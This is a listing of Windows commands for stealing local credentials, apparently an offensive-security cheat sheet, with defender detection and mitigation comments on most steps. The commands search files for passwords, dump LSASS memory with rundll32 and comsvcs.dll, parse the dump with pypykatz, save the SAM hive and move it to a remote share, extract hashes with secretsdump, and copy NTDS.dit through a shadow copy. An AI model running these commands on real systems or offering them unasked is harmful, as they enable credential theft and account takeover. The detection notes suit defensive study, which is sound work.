Windows Local Password Attacks
# Mixed cmd.exe / PowerShell / Python command listing for local credential access on Windows.
# Each step assumes local administrator rights and leaves host-side artifacts; the detection
# and mitigation notes below are the points a defender should key on.

# List running processes with the services they host (this is where the lsass.exe PID used below comes from)
tasklist /svc
# Search files for "password"
# /S recurses into subdirectories, /I is case-insensitive, /M prints only the matching file names,
# /C: treats the argument as a literal string. Very noisy on large trees (file-read telemetry).
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
# Dump LSASS process
# 672 is an example PID — the real value comes from the Get-Process / tasklist output.
# Detection: rundll32.exe loading comsvcs.dll and opening a handle to lsass.exe, followed by a new
# .dmp file on disk. Mitigation: LSA Protection (RunAsPPL) prevents non-protected processes from
# opening lsass.exe for dumping; Credential Guard isolates the secrets the dump would otherwise hold.
Get-Process lsass
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
# Extract credentials from LSASS dump (offline parsing of the .dmp; no further telemetry on the source host)
pypykatz lsa minidump /path/to/lsassdumpfile
# Save and move registry hives
# Only the SAM hive is shown; the security.save and system.save files used by secretsdump below
# are produced the same way from hklm\security and hklm\system. <ip> is a placeholder.
# Detection: reg.exe invoked with "save" and a hive name, a SAM copy written to disk, and an
# outbound SMB write of that file to a share.
reg.exe save hklm\sam C:\sam.save
move sam.save \\<ip>\NameofFileShare
# Dump password hashes using secretsdump.py
# LOCAL selects offline parsing of the three saved hives instead of connecting to a live host.
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
# Create volume shadow copy and copy NTDS.dit
# Domain controllers only: NTDS.dit is locked while the DC runs, hence the shadow copy.
# HarddiskVolumeShadowCopy2 is an example — vssadmin prints the actual shadow copy volume name.
# Detection: vssadmin CREATE SHADOW outside a backup window, and any copy of NTDS.dit via a
# \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy* path.
vssadmin CREATE SHADOW /For=C:
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
# Unquoted service path check (local privesc): list auto-start services whose binary is outside
# C:\Windows and whose pathname contains no double quote (the trailing findstr /v """ drops quoted
# paths). Remediation: quote the service ImagePath and restrict write ACLs on the directories along
# it. Note wmic is deprecated on current Windows builds — confirm it is still present on the host.
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """